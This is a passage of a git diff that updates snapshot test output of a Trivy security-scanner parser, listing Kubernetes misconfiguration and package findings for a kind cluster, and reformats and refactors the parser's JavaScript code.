"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "description": "Check whether role permits wildcard verb on specific resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Create a role which does not permit wildcard verb on specific resources", + "name": "No wildcard verb roles(Role permits wildcard verb on specific resources)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://avd.aquasec.com/misconfig/ksv045", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'DaemonSet/kube-proxy' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", + "foundIn": "Target: 'ClusterRole/local-path-provisioner-role' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV056", "installedVersion": undefined, "packageName": undefined, "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv056", ], }, "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "description": "The ability to control which pods get service traffic directed to them allows for interception attacks. Controlling network policy allows for bypassing lateral movement restrictions.", + "location": "scb://trivy/?Kind=ClusterRole&Name=local-path-provisioner-role", + "mitigation": "Networking resources are only allowed for verbs 'list', 'watch', 'get'", + "name": "Do not allow management of networking resources(ClusterRole 'local-path-provisioner-role' should not have access to resources ["services", "endpoints", "endpointslices", "networkpolicies", "ingresses"] for verbs ["create", "update", "patch", "delete", "deletecollection", "impersonate", "*"])", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://avd.aquasec.com/misconfig/ksv056", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { @@ -170128,456 +170802,6 @@ commonly used by applications.", ], "severity": "HIGH", }, - { - "attributes": { - "fixedVersion": "2020d-0+deb9u1", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2424-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2020e-0+deb9u1", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2509-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u1", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2542-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u2", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2797-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new upstream version", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u3", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-2963-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2021a-0+deb9u4", - "foundIn": "Target: 'k8s.gcr.io/etcd:3.4.13-0 (debian 9.13)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3051-1", - "installedVersion": "2020a-0+deb9u1", - "packageName": "tzdata", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": undefined, - "name": "tzdata - new timezone database", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", - ], - }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'etcd' of Pod 'etcd-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV009", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv009", - ], - }, - "category": "Misconfiguration", - "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", - "name": "Access to host network(Pod 'etcd-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv009", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.cpu')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", - }, - { - "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'resources.limits.memory')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'etcd' of Pod 'etcd-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", - }, - { - "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV023", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv023", - ], - }, - "category": "Misconfiguration", - "description": "HostPath volumes must be forbidden.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Do not set 'spec.volumes[*].hostPath'.", - "name": "hostPath volumes mounted(Pod 'etcd-kind-control-plane' should not set 'spec.template.volumes.hostPath')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv023", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Pod/etcd-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - }, - ], - "severity": "LOW", - }, { "attributes": { "fixedVersion": undefined, @@ -170868,6 +171092,35 @@ commonly used by applications.", ], "severity": "HIGH", }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'ClusterRole/system:controller:horizontal-pod-autoscaler' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + "https://avd.aquasec.com/misconfig/ksv046", + ], + }, + "category": "Misconfiguration", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:horizontal-pod-autoscaler", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/misconfig/ksv046", + }, + { + "type": "URL", + "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", + }, + ], + "severity": "HIGH", + }, { "attributes": { "fixedVersion": undefined, @@ -171045,24 +171298,24 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV048", + "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV046", "installedVersion": undefined, "packageName": undefined, "references": [ "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv048", + "https://avd.aquasec.com/misconfig/ksv046", ], }, "category": "Misconfiguration", - "description": "Check whether role permits update/create of a malicious pod", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", - "mitigation": "Create a role which does not permit update/create of a malicious pod", - "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", + "description": "Check whether role permits specific verb on wildcard resources", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", + "mitigation": "Create a role which does not permit specific verb on wildcard resources", + "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv048", + "value": "https://avd.aquasec.com/misconfig/ksv046", }, { "type": "URL", @@ -171074,24 +171327,24 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRole/system:controller:resourcequota-controller' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV046", + "foundIn": "Target: 'ClusterRole/system:controller:replication-controller' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV048", "installedVersion": undefined, "packageName": undefined, "references": [ "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv046", + "https://avd.aquasec.com/misconfig/ksv048", ], }, "category": "Misconfiguration", - "description": "Check whether role permits specific verb on wildcard resources", - "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:resourcequota-controller", - "mitigation": "Create a role which does not permit specific verb on wildcard resources", - "name": "No wildcard resource roles(Role permits specific verb on wildcard resource)", + "description": "Check whether role permits update/create of a malicious pod", + "location": "scb://trivy/?Kind=ClusterRole&Name=system:controller:replication-controller", + "mitigation": "Create a role which does not permit update/create of a malicious pod", + "name": "Do not allow update/create of a malicious pod(Role permits create/update of a malicious pod)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv046", + "value": "https://avd.aquasec.com/misconfig/ksv048", }, { "type": "URL", @@ -171419,35 +171672,6 @@ commonly used by applications.", ], "severity": "HIGH", }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'ClusterRoleBinding/admin-user' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV111", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - "https://avd.aquasec.com/misconfig/ksv111", - ], - }, - "category": "Misconfiguration", - "description": "The RBAC role cluster-admin provides wide-ranging powers over the environment and should be used only where and when needed.", - "location": "scb://trivy/?Kind=ClusterRoleBinding&Name=admin-user", - "mitigation": "Identify all clusterrolebindings to the cluster-admin role. Check if they are used and if they need this role or if they could use a role with fewer privileges.", - "name": "Ensure that the cluster-admin role is only used where required(ClusterRoleBinding 'admin-user' with role 'cluster-admin' should be used only when required)", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv111", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/rbac-good-practices/", - }, - ], - "severity": "MEDIUM", - }, { "attributes": { "fixedVersion": undefined, diff --git a/scanners/trivy/parser/parser.js b/scanners/trivy/parser/parser.js index 973aecf8f4..d5b302aaeb 100644 --- a/scanners/trivy/parser/parser.js +++ b/scanners/trivy/parser/parser.js @@ -2,20 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { + if (!fileContent) { + return []; + } // The first scan always contains the image id a similar format to: "bkimminich/juice-shop:v10.2.0 (alpine 3.11.5)" - let scanResults = fileContent; - if (typeof fileContent === "string") { - if (fileContent.includes("{") && fileContent.includes("}")) { - scanResults = JSON.parse(fileContent) - } else { - // empty file - return []; - } - } + const scanResults = JSON.parse(fileContent); - if (Object.prototype.hasOwnProperty.call(scanResults, 'ClusterName')) { + if (Object.prototype.hasOwnProperty.call(scanResults, "ClusterName")) { // Results of k8s-scans always contain an attribute 'ClusterName' at first position of the JSON document. // These scan-results need a different parsing const clusterName = scanResults.ClusterName; @@ -27,60 +22,75 @@ async function parse(fileContent) { function parseImageScanResults(imageScanResults) { // check if imageScanResults.Results is an array and non empty - if (!Array.isArray(imageScanResults.Results) || imageScanResults.Results.length === 0) { + if ( + !Array.isArray(imageScanResults.Results) || + imageScanResults.Results.length === 0 + ) { return []; } const imageId = imageScanResults.ArtifactName; - - // Use flatMap to iterate through imageScanResults.Results and flatten the resulting findings array -const findings = imageScanResults.Results.flatMap(({ Target: target, Vulnerabilities }) => { - const vulnerabilities = Vulnerabilities || []; - const category = getCategory(target); - - // Map each vulnerability to a finding object - return vulnerabilities.map(vulnerability => { - const { VulnerabilityID, References } = vulnerability; - - // Create CVE/NSWG references and their URLs if applicable - const cve_nswg_references = VulnerabilityID.startsWith("CVE-") ? [ - { type: "CVE", value: VulnerabilityID }, - { type: "URL", value: `https://nvd.nist.gov/vuln/detail/${VulnerabilityID}` } - ] : VulnerabilityID.startsWith("NSWG-") ? [ - { type: "NSWG", value: VulnerabilityID }, - { type: "URL", value: `https://github.com/nodejs/security-wg/tree/master/vuln` } - ] : []; - - const url_references = getUrlReferences(References); - - // Combine CVE/NSWG and URL references - const references = [...cve_nswg_references, ...url_references]; - - // Return the findings object for the current vulnerability - return { - name: vulnerability.Title || `Vulnerability in Dependency ${vulnerability.PkgName} (${vulnerability.InstalledVersion})`, - description: vulnerability.Description, - category, - location: `scb://trivy/?ArtifactName=${imageId}`, - osi_layer: "NOT_APPLICABLE", - severity: getAdjustedSeverity(vulnerability.Severity), - mitigation: `Update the affected package ${vulnerability.PkgName} to the fixed version: ${vulnerability.FixedVersion} or remove the package from the image.`, - references, - attributes: { - installedVersion: vulnerability.InstalledVersion, - fixedVersion: vulnerability.FixedVersion, - packageName: vulnerability.PkgName, - vulnerabilityId: VulnerabilityID, - references: References, - foundIn: target, - }, - }; - }); -}); - -return findings; + // Use flatMap to iterate through imageScanResults.Results and flatten the resulting findings array + const findings = imageScanResults.Results.flatMap( + ({ Target: target, Vulnerabilities }) => { + const vulnerabilities = Vulnerabilities || []; + const category = getCategory(target); + + // Map each vulnerability to a finding object + return vulnerabilities.map((vulnerability) => { + const { VulnerabilityID, References } = vulnerability; + + // Create CVE/NSWG references and their URLs if applicable + const cve_nswg_references = VulnerabilityID.startsWith("CVE-") + ? [ + { type: "CVE", value: VulnerabilityID }, + { + type: "URL", + value: `https://nvd.nist.gov/vuln/detail/${VulnerabilityID}`, + }, + ] + : VulnerabilityID.startsWith("NSWG-") + ? [ + { type: "NSWG", value: VulnerabilityID }, + { + type: "URL", + value: `https://github.com/nodejs/security-wg/tree/master/vuln`, + }, + ] + : []; + + const url_references = getUrlReferences(References); + + // Combine CVE/NSWG and URL references + const references = [...cve_nswg_references, ...url_references]; + + // Return the findings object for the current vulnerability + return { + name: + vulnerability.Title || + `Vulnerability in Dependency ${vulnerability.PkgName} (${vulnerability.InstalledVersion})`, + description: vulnerability.Description, + category, + location: `scb://trivy/?ArtifactName=${imageId}`, + osi_layer: "NOT_APPLICABLE", + severity: getAdjustedSeverity(vulnerability.Severity), + mitigation: `Update the affected package ${vulnerability.PkgName} to the fixed version: ${vulnerability.FixedVersion} or remove the package from the image.`, + references, + attributes: { + installedVersion: vulnerability.InstalledVersion, + fixedVersion: vulnerability.FixedVersion, + packageName: vulnerability.PkgName, + vulnerabilityId: VulnerabilityID, + references: References, + foundIn: target, + }, + }; + }); + }, + ); + return findings; } function parseK8sScanResults(clusterName, scanResults) { @@ -102,19 +112,26 @@ function parseK8sScanResults(clusterName, scanResults) { */ return new Promise((resolve, reject) => { - var keys = Object.keys(scanResults); const expectedTopLevelAttributes = ["ClusterName", "Resources"]; - const found = keys.find(key => !expectedTopLevelAttributes.includes(key)); + const found = keys.find((key) => !expectedTopLevelAttributes.includes(key)); if (found !== undefined) { - reject(new Error("Unexpected attribute '" + found + "' on top-level of scan-result document")); + reject( + new Error( + "Unexpected attribute '" + + found + + "' on top-level of scan-result document", + ), + ); } if (!scanResults.Resources || scanResults.Resources.length === 0) { - reject(new Error("No resources listet in scan-result document")); + reject(new Error("No resources listed in scan-result document")); } - const findings = scanResults.Resources.flatMap((resourceItem) => parseK8sScanResultResource(clusterName, resourceItem, reject)); + const findings = scanResults.Resources.flatMap((resourceItem) => + parseK8sScanResultResource(clusterName, resourceItem, reject), + ); resolve(findings); }); @@ -123,49 +140,99 @@ function parseK8sScanResults(clusterName, scanResults) { function parseK8sScanResultResource(clusterName, resourceItem, reject) { let findings = []; - const {Namespace: namespace, Kind: kind, Name: name, Results} = resourceItem; + const { + Namespace: namespace, + Kind: kind, + Name: name, + Results, + } = resourceItem; const results = Results || []; for (const aResult of results) { - const {Target: target, Class: clazz, Type: type} = aResult; + const { Target: target, Class: clazz, Type: type } = aResult; const keys = Object.keys(aResult); - const expectedAttributes = ["Target", "Class", "Type", "Misconfigurations", "Vulnerabilities", "MisconfSummary", "Packages"]; + const expectedAttributes = [ + "Target", + "Class", + "Type", + "Misconfigurations", + "Vulnerabilities", + "MisconfSummary", + "Packages", + ]; // The "Packages" attribute is now included in the scan report by default starting with Trivy 0.56.0 (https://github.com/aquasecurity/trivy/pull/6765) - const found = keys.find(key => !expectedAttributes.includes(key)); + const found = keys.find((key) => !expectedAttributes.includes(key)); if (found !== undefined) { - reject(new Error("Unexpected attribute '" + found + "' on resource-item")); + reject( + new Error("Unexpected attribute '" + found + "' on resource-item"), + ); } - let categoryName = 'Vulnerabilities'; + let categoryName = "Vulnerabilities"; const vulnerabilities = aResult[categoryName] || []; findings = findings.concat( - vulnerabilities.map(vulnerability => - convertTrivyK8sFindingToSCBFinding(vulnerability, clusterName, namespace, kind, name, target, clazz, type, categoryName) - ) + vulnerabilities.map((vulnerability) => + convertTrivyK8sFindingToSCBFinding( + vulnerability, + clusterName, + namespace, + kind, + name, + target, + clazz, + type, + categoryName, + ), + ), ); - categoryName = 'Misconfigurations'; + categoryName = "Misconfigurations"; const misconfigurations = aResult[categoryName] || []; findings = findings.concat( - misconfigurations.map(misconfiguration => - convertTrivyK8sFindingToSCBFinding(misconfiguration, clusterName, namespace, kind, name, target, clazz, type, categoryName) - ) + misconfigurations.map((misconfiguration) => + convertTrivyK8sFindingToSCBFinding( + misconfiguration, + clusterName, + namespace, + kind, + name, + target, + clazz, + type, + categoryName, + ), + ), ); } return findings; } -function convertTrivyK8sFindingToSCBFinding(trivyK8sFinding, clusterName, namespace, kind, k8sName, target, clazz, type, categoryName) { - let references = trivyK8sFinding.PrimaryURL ? [{type: "URL", value: 